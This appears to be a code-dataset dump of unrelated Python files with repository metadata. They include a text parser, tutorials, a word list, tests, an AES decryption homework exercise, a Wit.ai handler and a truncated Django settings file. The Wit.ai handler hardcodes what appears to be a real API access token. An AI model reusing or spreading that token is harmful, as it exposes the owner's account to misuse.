52e589ec26ec934cedbbb77cf5a8fda7e7d9cd96 | 1,115 | py | Python | woffle/data/parse.py | Finnkauski/woffle | 746ceb22ef03232f7963db6f7fb2f95fe0164a07 | [
"MIT"
] | null | null | null | woffle/data/parse.py | Finnkauski/woffle | 746ceb22ef03232f7963db6f7fb2f95fe0164a07 | [
"MIT"
] | null | null | null | woffle/data/parse.py | Finnkauski/woffle | 746ceb22ef03232f7963db6f7fb2f95fe0164a07 | [
"MIT"
] | null | null | null | """
text cleaning
"""
#-- Imports ---------------------------------------------------------------------
# base
import functools
import re
# third party
import toml
# project
from woffle.functions.compose import compose
#-- Definitions -----------------------------------------------------------------
#-- cleaning
#NOTE: all functions are endomorphic String -> String so their composition does
# not need to be tested and they can be composed in any order
# read the config files for the operations
with open('etc/regex') as f:
replace = toml.load(f)
with open('etc/encoding') as f:
encode = toml.load(f)
def regexes(r : dict, x : str) -> str:
return compose(*[functools.partial(re.sub, i, j) for i,j in r.items()])(x)
replacements = functools.partial(regexes, replace)
encoding = functools.partial(regexes, encode)
def unlines(x : str) -> str:
return x.replace('\n', '')
# Composition -----------------------------------------------------------------
parse = compose( encoding
, replacements
, unlines
, str.strip
)
| 24.23913 | 81 | 0.528251 | 121 | 1,115 | 4.867769 | 0.578512 | 0.081494 | 0.037351 | 0.044143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.2 | 1,115 | 45 | 82 | 24.777778 | 0.660314 | 0.423318 | 0 | 0 | 0 | 0 | 0.036741 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.105263 | false | 0 | 0.210526 | 0.105263 | 0.421053 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 |
52edcb7aea820f4031994c44df4c877102b60d05 | 385 | py | Python | Chapter 4 - Lists & Tuples/01_list.py | alex-dsouza777/Python-Basics | 8f1c406f2319cd65b5d54dfea990d09fa69d9adf | [
"MIT"
] | null | null | null | Chapter 4 - Lists & Tuples/01_list.py | alex-dsouza777/Python-Basics | 8f1c406f2319cd65b5d54dfea990d09fa69d9adf | [
"MIT"
] | null | null | null | Chapter 4 - Lists & Tuples/01_list.py | alex-dsouza777/Python-Basics | 8f1c406f2319cd65b5d54dfea990d09fa69d9adf | [
"MIT"
] | 1 | 2021-04-21T10:23:08.000Z | 2021-04-21T10:23:08.000Z | #Create a list using []
a = [1,2,3,7,66]
#print the list using print() function
print(a)
#Access using index using a[0], a[1], ....
print(a[2])
#Changing the value of the list
a[0] = 777
print(a)
#We can create a list with items of different type
b = [77,"Root",False,6.9]
print(b)
#List Slicing
friends = ["Root","Groot","Sam","Alex",99]
print(friends[0:3])
print(friends[-4:])
| 16.73913 | 50 | 0.649351 | 73 | 385 | 3.424658 | 0.520548 | 0.072 | 0.088 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.067692 | 0.155844 | 385 | 22 | 51 | 17.5 | 0.701538 | 0.496104 | 0 | 0.2 | 0 | 0 | 0.106952 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.6 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 |
52fa77fc729c94ac81a3d83288fe663868091162 | 5,421 | py | Python | 2parser/word_lists.py | formalabstracts/CNL-CIC | c857ee0d52b4ba91dd06a51c8f9f3ec2749ca0eb | [
"MIT"
] | 14 | 2019-06-27T16:34:39.000Z | 2021-01-07T18:13:04.000Z | 2parser/word_lists.py | formalabstracts/CNL-CIC | c857ee0d52b4ba91dd06a51c8f9f3ec2749ca0eb | [
"MIT"
] | 8 | 2019-10-17T06:09:51.000Z | 2020-03-25T15:51:32.000Z | 2parser/word_lists.py | formalabstracts/CNL-CIC | c857ee0d52b4ba91dd06a51c8f9f3ec2749ca0eb | [
"MIT"
] | 17 | 2019-06-27T16:34:53.000Z | 2020-08-15T01:30:32.000Z | singular = [
'this','as','is','thesis','hypothesis','less','obvious','us','yes','cos',
'always','perhaps','alias','plus','apropos',
'was','its','bus','his','is','us',
'this','thus','axis','bias','minus','basis',
'praxis','status','modulus','analysis',
'aparatus'
]
invariable = [ #frozen_list - cannot be given a synonym
'a','an','all','and','any','are','as','assume','be','by',
'case','classifier',
'coercion','conjecture','contradiction','contrary','corollary','declare',
'def',
'define','defined','definition','denote','division','do','document',
'does','dump','each','else','end','enddivision','endsection',
'endsubdivision','endsubsection','endsubsubsection','equal',
'equation','error','enter','every','exhaustive','exist','exit',
'false','fix','fixed','for','forall','formula','fun','function','has','have',
'having','hence','holding','hypothesis','if','iff','in','inferring',
'indeed','induction','inductive','introduce','is','it','left','lemma',
'let','library','make','map','match','moreover','mutual','namespace',
'no','not','notational','notation',
'notationless','obvious','of','off','on','only','ontored','or','over',
'pairwise','parameter','precedence','predicate','printgoal',
'proof','prop','property','prove','proposition',
'propped','qed','quotient','read','record','register','recursion','right',
'said','say','section','show','some','stand','structure','subdivision',
'subsection','subsubsection','such','suppose','synonym','take','that',
'the','then','theorem','there','therefore','thesis','this','timelimit',
'to','total','trivial','true','type','unique','us',
'warning','we','well','welldefined','well_defined','well_propped',
'where','with','write','wrong','yes',
#(* plural handled by sing 'classifiers', 'exists','implement',
# 'parameters','properties','propositions','synonyms','types',
]
transition = [ #phrase_list_transition_words
'a basic fact is','accordingly','additionally','again','also','and yet','as a result',
'as usual','as we have seen','as we see','at the same time','besides','but',
'by definition','certainly','clearly','computations show','consequently',
'conversely','equally important','explicitly','finally','first','for example',
'for instance','for simplicity','for that reason','for this purpose','further',
'furthermore','generally','hence','here','however','importantly','in addition',
'in any event','in brief','in consequence','in contrast','in contrast to this',
'in each case','in fact','in general','in other words','in particular','in short',
'in sum','in summary','in the present case','in the same way','in this computation',
'in this sense','indeed','it follows','it is clear','it is enough to show',
'it is known','it is routine','it is trivial to see','it is understood',
'it turns out','last','likewise','more precisely','moreover','most importantly',
'nevertheless','next','nonetheless','note',
'notice','now','observe','obviously','of course','on the contrary','on the other hand',
'on the whole','otherwise','second','similarly','so','specifically','still',
'that is','the point is','then','therefore','third','this gives','this implies',
'this means','this yields','thus','thus far','to begin with','to this end',
'trivially','we claim','we emphasize','we first show','we get','we have seen',
'we have','we know','we check','we may check','we obtain','we remark','we say','we see',
'we show','we understand','we write','recall','we recall',
'without loss of generality','yet'
]
preposition_list = [
'aboard','about','above','according to', 'across', 'against', 'ahead of',
'along','alongside','amid','amidst','among','around','at','atop','away from',
'before',
'behind','below','beneath','beside','between','beyond','by','concerning','despite',
'except','except at','excluding','following',
'from','in','in addition to','in place of','in regard to',
'inside','instead of','into','near','next to','of',
'off','on','on behalf of','on top of','onto','opposite','out','out of',
'outside','outside of',
'over','owing to','per','prior to','regarding','save','through',
'throughout','till','to','towards','under','until',
'up','up to','upon','with','with respect to','wrt','within','without'
# 'for', 'as', 'like', 'after', 'round', 'plus', 'since', 'than', 'past',
# 'during',
# 'wrt' is kept as a synonym of 'with respect to'
]
prim_list = [
'prim_classifier',
'prim_term_op_controlseq',
'prim_binary_relation_controlseq',
'prim_propositional_op_controlseq',
'prim_type_op_controlseq',
'prim_term_controlseq',
'prim_type_controlseq',
'prim_lambda_binder',
'prim_pi_binder',
'prim_binder_prop',
'prim_typed_name',
'prim_adjective',
'prim_adjective_multisubject',
'prim_simple_adjective',
'prim_simple_adjective_multisubject',
'prim_field_term_accessor',
'prim_field_type_accessor',
'prim_field_prop_accessor',
'prim_definite_noun',
'prim_identifier_term',
'prim_identifier_type',
'prim_possessed_noun',
'prim_verb',
'prim_verb_multisubject',
'prim_structure',
'prim_type_op',
'prim_type_word',
'prim_term_op',
'prim_binary_relation_op',
'prim_propositional_op',
'prim_relation'
]
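The preposition list above mixes single words with multi-word phrases ('in addition to', 'on top of'), so any tokenizer consuming these entries has to prefer the longest match over a single-word prefix. A minimal standalone sketch of longest-first phrase matching (the strategy and function name are illustrative assumptions, not taken from this codebase):

```python
def match_phrase(words, phrases):
    """Return the longest phrase in `phrases` that prefixes the token list `words`."""
    best = None
    for phrase in phrases:
        toks = phrase.split()
        if words[:len(toks)] == toks and (best is None or len(toks) > len(best.split())):
            best = phrase
    return best

phrases = ['about', 'according to', 'in', 'in addition to', 'on', 'on top of']
print(match_phrase('in addition to taxes'.split(), phrases))  # -> in addition to
print(match_phrase('near the top'.split(), phrases))          # -> None
```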
# --- answers/leetcode/Summary Ranges/Summary Ranges.py (repo: FeiZhan/Algo-Collection, license: MIT) ---
class Solution(object):
def summaryRanges(self, nums):
"""
:type nums: List[int]
:rtype: List[str]
"""
range_list = []
for i in range(len(nums)):
if i > 0 and nums[i - 1] + 1 == nums[i]:
range_list[-1][1] = nums[i]
else:
range_list.append([nums[i], nums[i]])
str_list = [str(range_list[i][0]) + ("->" + str(range_list[i][1]) if range_list[i][0] != range_list[i][1] else "") for i in range(len(range_list))]
return str_list
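The run-merging logic in summaryRanges can be checked in isolation; this is a standalone restatement of the same algorithm (function name chosen here for illustration):

```python
def summary_ranges(nums):
    ranges = []
    for i, n in enumerate(nums):
        if i > 0 and nums[i - 1] + 1 == n:
            ranges[-1][1] = n        # extend the current consecutive run
        else:
            ranges.append([n, n])    # start a new run
    return ['{0}->{1}'.format(a, b) if a != b else str(a) for a, b in ranges]

print(summary_ranges([0, 1, 2, 4, 5, 7]))  # -> ['0->2', '4->5', '7']
```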
# --- amplpy/tests/TestBase.py (repo: dish59742/amplpy, license: BSD-3-Clause) ---
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import print_function, absolute_import, division
from builtins import map, range, object, zip, sorted
from .context import amplpy
import unittest
import tempfile
import shutil
import os
class TestBase(unittest.TestCase):
def setUp(self):
self.ampl = amplpy.AMPL()
self.dirpath = tempfile.mkdtemp()
def str2file(self, filename, content):
fullpath = self.tmpfile(filename)
with open(fullpath, 'w') as f:
print(content, file=f)
return fullpath
def tmpfile(self, filename):
return os.path.join(self.dirpath, filename)
def tearDown(self):
self.ampl.close()
shutil.rmtree(self.dirpath)
if __name__ == '__main__':
unittest.main()
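The str2file/tmpfile helpers above boil down to a small tempdir-plus-print pattern; a standalone sketch of the same round trip (note that print() appends a trailing newline to the file):

```python
import os
import shutil
import tempfile

dirpath = tempfile.mkdtemp()                    # per-test scratch directory (setUp)
fullpath = os.path.join(dirpath, 'model.mod')   # tmpfile()
with open(fullpath, 'w') as f:
    print('var x >= 0;', file=f)                # str2file() writes via print()

with open(fullpath) as f:
    content = f.read()
print(content == 'var x >= 0;\n')               # -> True (print added the newline)
shutil.rmtree(dirpath)                          # tearDown() cleanup
```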
# --- week2/decrypt.py (repo: vtnil/Cryptography-I-Homework, license: MIT) ---
# written by vtnil for the Cryptography I week 2 homework
# ppt https://crypto.stanford.edu/~dabo/cs255/lectures/PRP-PRF.pdf
from Crypto.Cipher import AES
from binascii import a2b_hex
from math import ceil
questions = [
{"key": "140b41b22a29beb4061bda66b6747e14",
"ct": "4ca00ff4c898d61e1edbf1800618fb2828a226d160dad07883d04e008a7897ee2e4b7465d5290d0c0e6c6822236e1daafb94ffe0c5da05d9476be028ad7c1d81"},
{"key": "140b41b22a29beb4061bda66b6747e14",
"ct": "5b68629feb8606f9a6667670b75b38a5b4832d0f26e1ab7da33249de7d4afc48e713ac646ace36e872ad5fb8a512428a6e21364b0c374df45503473c5242a253"},
{"key": "36f18357be4dbd77f050515c73fcf9f2",
"ct": "69dda8455c7dd4254bf353b773304eec0ec7702330098ce7f7520d1cbbb20fc388d1b0adb5054dbd7370849dbf0b88d393f252e764f1f5f7ad97ef79d59ce29f5f51eeca32eabedd9afa9329"},
{"key": "36f18357be4dbd77f050515c73fcf9f2",
"ct": "770b80259ec33beb2561358a9f2dc617e46218c0a53cbeca695ae45faa8952aa0e311bde9d4e01726d3184c34451"},
]
BLOCK_SIZE = 16
MODEL_CBC = 'cbc'
MODEL_CTR = 'ctr'
AES.block_size = BLOCK_SIZE
def decrypt(question, mode):
key = a2b_hex(question['key'])
ctb = a2b_hex(question['ct'])
iv = ctb[:BLOCK_SIZE]
ct = ctb[BLOCK_SIZE:]
plain = []
    cipher = AES.new(key)  # PyCrypto defaults to ECB; used here as a raw block cipher
if mode == MODEL_CBC:
_iv = iv
for i in range(0, int(len(ct) / BLOCK_SIZE)):
_b = ct[BLOCK_SIZE * i: BLOCK_SIZE * (i + 1)]
_k = cipher.decrypt(_b)
plain += [a ^ b for (a, b) in zip(_iv, _k)]
_iv = _b
# remove padding
_len = plain[-1]
if [_len] * _len == plain[-_len:]:
plain = plain[:-_len]
else:
for i in range(0, ceil(len(ct) / BLOCK_SIZE)):
# Be careful!!! Here is ENCRYPT!!
_k = cipher.encrypt((int.from_bytes(iv, 'big') + i).to_bytes(BLOCK_SIZE, 'big'))
_b = ct[BLOCK_SIZE * i: BLOCK_SIZE * (i + 1)]
plain += [_k[i] ^ _b[i] for i in range(0, len(_b))]
return ''.join([chr(a) for a in plain])
print(decrypt(questions[0], MODEL_CBC))
print(decrypt(questions[1], MODEL_CBC))
print(decrypt(questions[2], MODEL_CTR))
print(decrypt(questions[3], MODEL_CTR))
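The `_len` check in the CBC branch strips PKCS#7 padding: the last byte gives the pad length, and all pad bytes must equal that value. The same check standalone, operating on lists of ints the way `plain` is built above (function name is illustrative):

```python
def strip_pkcs7(plain, block_size=16):
    pad = plain[-1]
    if 0 < pad <= block_size and [pad] * pad == plain[-pad:]:
        return plain[:-pad]
    return plain  # not valid padding; leave untouched

print(strip_pkcs7([104, 105, 3, 3, 3]))  # -> [104, 105]
print(strip_pkcs7([104, 105, 2, 9, 2]))  # -> [104, 105, 2, 9, 2]
```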
# --- alpyro_msgs/actionlib/testrequestresult.py (repo: rho2/alpyro_msgs, license: MIT) ---
from alpyro_msgs import RosMessage, boolean, int32
class TestRequestResult(RosMessage):
__msg_typ__ = "actionlib/TestRequestResult"
__msg_def__ = "aW50MzIgdGhlX3Jlc3VsdApib29sIGlzX3NpbXBsZV9zZXJ2ZXIKCg=="
__md5_sum__ = "61c2364524499c7c5017e2f3fce7ba06"
the_result: int32
is_simple_server: boolean
| 28.272727 | 74 | 0.829582 | 27 | 311 | 8.851852 | 0.814815 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.129964 | 0.109325 | 311 | 10 | 75 | 31.1 | 0.732852 | 0 | 0 | 0 | 0 | 0 | 0.369775 | 0.369775 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.142857 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
5e0b345e85244d00d3751d3404f05d4e2bfd639f | 269 | py | Python | bo/files/applicant/registulang/fileupload/pdf2txt/main.py | isoneday/KMS | 7d27e16af7626afd27a0980735985f5f2590f500 | [
"MIT"
] | null | null | null | bo/files/applicant/registulang/fileupload/pdf2txt/main.py | isoneday/KMS | 7d27e16af7626afd27a0980735985f5f2590f500 | [
"MIT"
] | null | null | null | bo/files/applicant/registulang/fileupload/pdf2txt/main.py | isoneday/KMS | 7d27e16af7626afd27a0980735985f5f2590f500 | [
"MIT"
] | null | null | null | from src import mining
from tkinter import filedialog

directory = filedialog.askdirectory()  # avoid shadowing the built-in dir()
direcciones, nomArchivo = mining.path(directory)
cont = mining.coincidencias(direcciones, nomArchivo)
for i in range(len(nomArchivo)):
    print(nomArchivo[i], cont[i])

# --- ip_system/models.py (repo: 9dev/django-ip-system, license: MIT) ---
from django.db import models
from .utils import get_ip_from_request
class Ip(models.Model):
address = models.GenericIPAddressField(unique=True, db_index=True)
@classmethod
def get_or_create(cls, request):
raw_ip = get_ip_from_request(request)
if not raw_ip:
return None
obj, _ = cls.objects.get_or_create(address=raw_ip)
return obj
def __str__(self):
return self.address.__str__()
| 22.75 | 70 | 0.679121 | 62 | 455 | 4.612903 | 0.483871 | 0.052448 | 0.062937 | 0.111888 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.241758 | 455 | 19 | 71 | 23.947368 | 0.828986 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.153846 | false | 0 | 0.153846 | 0.076923 | 0.692308 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
5e0ee7490d2f9d87de60db0d3047b19a4411a85c | 1,267 | py | Python | binary_tree/tests/m_create_from_pre_in_test.py | dhrubach/python-code-recipes | 14356c6adb1946417482eaaf6f42dde4b8351d2f | [
"MIT"
] | null | null | null | binary_tree/tests/m_create_from_pre_in_test.py | dhrubach/python-code-recipes | 14356c6adb1946417482eaaf6f42dde4b8351d2f | [
"MIT"
] | null | null | null | binary_tree/tests/m_create_from_pre_in_test.py | dhrubach/python-code-recipes | 14356c6adb1946417482eaaf6f42dde4b8351d2f | [
"MIT"
] | null | null | null | from binary_tree.m_create_from_pre_in import BinaryTree
class TestBinaryTree:
def test_lc_data_1(self):
bt = BinaryTree()
preorder = [3, 9, 20, 15, 7]
inorder = [9, 3, 15, 20, 7]
ans = bt.buildFromPreInOrder(preorder=preorder, inorder=inorder)
assert ans.val == 3
assert ans.left.val == 9
assert ans.right.left.val == 15
preorder = [3, 9, 20, 15, 7]
inorder = [9, 3, 15, 20, 7]
ans = bt.buildFromPreInOrderOptimized(preorder=preorder, inorder=inorder)
assert ans.val == 3
assert ans.left.val == 9
assert ans.right.left.val == 15
def test_lc_data_2(self):
bt = BinaryTree()
preorder = [1, 2, 3]
inorder = [1, 3, 2]
ans = bt.buildFromPreInOrder(preorder=preorder, inorder=inorder)
assert ans.val == 1
assert ans.right.val == 2
assert ans.right.left.val == 3
def test_lc_data_3(self):
bt = BinaryTree()
preorder = [3, 9, 4, 2, 1, 5, 20, 15, 7]
inorder = [2, 4, 1, 9, 5, 3, 15, 20, 7]
ans = bt.buildFromPreInOrder(preorder=preorder, inorder=inorder)
assert ans.val == 3
assert ans.right.val == 20
assert ans.left.left.right.val == 1
| 29.465116 | 81 | 0.573796 | 177 | 1,267 | 4.028249 | 0.19774 | 0.151473 | 0.098177 | 0.168303 | 0.650771 | 0.621318 | 0.562412 | 0.562412 | 0.562412 | 0.562412 | 0 | 0.08371 | 0.302289 | 1,267 | 42 | 82 | 30.166667 | 0.722851 | 0 | 0 | 0.53125 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.375 | 1 | 0.09375 | false | 0 | 0.03125 | 0 | 0.15625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
5e15026007a09207c6424778c0b96d54f0620c12 | 1,725 | py | Python | tests/events/events_client_test.py | riaz-bordie-cko/checkout-sdk-python | d9bc073306c1a98544c326be693ed722576ea895 | [
"MIT"
] | null | null | null | tests/events/events_client_test.py | riaz-bordie-cko/checkout-sdk-python | d9bc073306c1a98544c326be693ed722576ea895 | [
"MIT"
] | null | null | null | tests/events/events_client_test.py | riaz-bordie-cko/checkout-sdk-python | d9bc073306c1a98544c326be693ed722576ea895 | [
"MIT"
] | null | null | null | import pytest
from checkout_sdk.events.events import RetrieveEventsRequest
from checkout_sdk.events.events_client import EventsClient
@pytest.fixture(scope='class')
def client(mock_sdk_configuration, mock_api_client):
return EventsClient(api_client=mock_api_client, configuration=mock_sdk_configuration)
class TestEventsClient:
def test_retrieve_all_event_types(self, mocker, client: EventsClient):
mocker.patch('checkout_sdk.api_client.ApiClient.get', return_value='response')
assert client.retrieve_all_event_types() == 'response'
def test_retrieve_events(self, mocker, client: EventsClient):
mocker.patch('checkout_sdk.api_client.ApiClient.get', return_value='response')
assert client.retrieve_events(RetrieveEventsRequest()) == 'response'
def test_retrieve_event(self, mocker, client: EventsClient):
mocker.patch('checkout_sdk.api_client.ApiClient.get', return_value='response')
assert client.retrieve_event('event_id') == 'response'
def test_retrieve_event_notification(self, mocker, client: EventsClient):
mocker.patch('checkout_sdk.api_client.ApiClient.get', return_value='response')
assert client.retrieve_event_notification('event_id', 'notification_id') == 'response'
def test_retry_webhook(self, mocker, client: EventsClient):
mocker.patch('checkout_sdk.api_client.ApiClient.post', return_value='response')
assert client.retry_webhook('event_id', 'webhook_id') == 'response'
def test_retry_all_webhooks(self, mocker, client: EventsClient):
mocker.patch('checkout_sdk.api_client.ApiClient.post', return_value='response')
assert client.retry_all_webhooks('event_id') == 'response'
| 46.621622 | 94 | 0.762899 | 207 | 1,725 | 6.057971 | 0.178744 | 0.064593 | 0.076555 | 0.133971 | 0.653908 | 0.5311 | 0.5311 | 0.5311 | 0.5311 | 0.5311 | 0 | 0 | 0.128696 | 1,725 | 36 | 95 | 47.916667 | 0.834331 | 0 | 0 | 0.24 | 0 | 0 | 0.221449 | 0.129855 | 0 | 0 | 0 | 0 | 0.24 | 1 | 0.28 | false | 0 | 0.12 | 0.04 | 0.48 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
5e18e6288b6b07a784cee38e7f2cbe8ce2280ae9 | 548 | py | Python | crawler_main.py | yangwenke2010/template_crawler | b95e626184cda21d2abe01fd1f2b399e4946e782 | [
"Apache-2.0"
] | 4 | 2018-12-16T15:06:20.000Z | 2022-03-09T11:18:11.000Z | crawler_main.py | yangwenke2010/template_crawler | b95e626184cda21d2abe01fd1f2b399e4946e782 | [
"Apache-2.0"
] | 1 | 2018-10-12T07:32:13.000Z | 2018-10-12T07:32:13.000Z | crawler_main.py | yangwenke2010/template_crawler | b95e626184cda21d2abe01fd1f2b399e4946e782 | [
"Apache-2.0"
] | 2 | 2018-10-12T06:58:08.000Z | 2020-03-19T10:44:34.000Z | #!/bin/bash
# -*- coding: utf-8 -*-
# Crawler Main
#
# Author : Tau Woo
# Date : 2018-07-19
from do.crawler import Do
from sys import argv
if __name__ == "__main__":
'''Crawler Main
Start crawl websites with appointed config.
'''
# You will get appointed crawler name from command.
crawler_name = "sample" if len(argv) == 1 else argv[1]
crawler = Do(crawler_name)
crawler.do()
# Here is a test for data from redis to xlsx files.
# crawler.rds_to_xlsx("{}.xlsx".format(crawler_name), crawler_name)
| 22.833333 | 71 | 0.645985 | 79 | 548 | 4.303797 | 0.594937 | 0.161765 | 0.105882 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.02619 | 0.233577 | 548 | 23 | 72 | 23.826087 | 0.783333 | 0.458029 | 0 | 0 | 0 | 0 | 0.066038 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
5e1c13b5fde8efced653749af34695c0b5d9ba5a | 498 | py | Python | philia-service/wit-service/wit_service.py | BuildForSDGCohort2/masta-backend | 08c20fe910f8ab953714ac72f34cdead7a307bd3 | [
"MIT"
] | 1 | 2020-11-25T12:01:31.000Z | 2020-11-25T12:01:31.000Z | philia-service/wit-service/wit_service.py | BuildForSDGCohort2/masta-backend | 08c20fe910f8ab953714ac72f34cdead7a307bd3 | [
"MIT"
] | 6 | 2020-08-31T12:12:53.000Z | 2020-10-01T13:00:44.000Z | philia-service/wit-service/wit_service.py | BuildForSDGCohort2/masta-backend | 08c20fe910f8ab953714ac72f34cdead7a307bd3 | [
"MIT"
] | 1 | 2020-08-31T15:31:37.000Z | 2020-08-31T15:31:37.000Z | import json
from wit import Wit
access_token = "2PLFUWBVVTYQCSEL6VDJ3AFQLUCTV7ZH"
client = Wit(access_token=access_token)
def wit_handler(event, context):
utterance = 'good morning john'
response = client.message(msg=utterance)
intent = None
entity = None
try:
intent = list(response['intents'])[0]
entity = list(response['entities'])
    except (KeyError, IndexError):
pass
return {
'statusCode': 200,
        'body': json.dumps({'intent': intent, 'entities': entity})
}
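The try/except above pulls the top intent and the entity list out of a Wit-style response dict; the same extraction as a standalone helper, run against a canned response (the response shape here is an assumption modeled on what the handler reads):

```python
def extract(response):
    try:
        return list(response['intents'])[0], list(response['entities'])
    except (KeyError, IndexError):
        return None, None

canned = {'intents': [{'name': 'greeting', 'confidence': 0.99}], 'entities': {}}
intent, entities = extract(canned)
print(intent['name'])  # -> greeting
print(extract({}))     # -> (None, None)
```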
# --- analytics/settings.py (repo: Kratos-Freyja/analytics, license: MIT) ---
"""
Django settings for analytics project.
Generated by 'django-admin startproject' using Django 1.11.10.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
from config import system
from config import database
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = system.APP_SECRET_KEY
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = system.DEBUG
ALLOWED_HOSTS = ['0.0.0.0', 'localhost']
# Session serializers
SESSION_SERIALIZER = 'django.contrib.sessions.serializers.PickleSerializer'
# Application definition
INSTALLED_APPS = [
'corsheaders',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'lead',
'fund',
'partner',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'corsheaders.middleware.CorsMiddleware',
]
# App urls
ROOT_URLCONF = 'analytics.urls'
CORS_ORIGIN_ALLOW_ALL = system.CORS_ORIGIN_ALLOW
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [
BASE_DIR + system.TEMPLATE_PATH, # base templates
],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
CACHES = {
"default": {
"BACKEND": "django_redis.cache.RedisCache",
"LOCATION": "redis://127.0.0.1:6379/1",
"TIMEOUT": None,
"OPTIONS": {
"MAX_ENTRIES": 1000,
"CLIENT_CLASS": "django_redis.client.DefaultClient",
"CONNECTION_POOL_KWARGS": {"max_connections": 100}
}
}
}
WSGI_APPLICATION = 'analytics.wsgi.application'
LOGIN_URL = '/login/'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
db: {
"ENGINE": database.config[db]["ENGINE"],
"NAME": database.config[db]["DB_NAME"],
"USER": database.config[db]["USERNAME"],
"PASSWORD": database.config[db]["PASSWORD"],
"HOST": database.config[db]["HOST"],
"PORT": database.config[db]["PORT"]
}
for db in database.config
}
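The DATABASES block above is a dict comprehension that expands every entry of `database.config` into Django's connection format. With a stand-in config dict (the values here are placeholders, not this project's real settings), the expansion works like this:

```python
config = {
    'default': {'ENGINE': 'django.db.backends.postgresql', 'DB_NAME': 'analytics',
                'USERNAME': 'app', 'PASSWORD': 'secret', 'HOST': 'localhost', 'PORT': '5432'},
}

databases = {
    db: {
        'ENGINE': config[db]['ENGINE'],
        'NAME': config[db]['DB_NAME'],
        'USER': config[db]['USERNAME'],
        'PASSWORD': config[db]['PASSWORD'],
        'HOST': config[db]['HOST'],
        'PORT': config[db]['PORT'],
    }
    for db in config
}
print(databases['default']['NAME'])  # -> analytics
```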
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
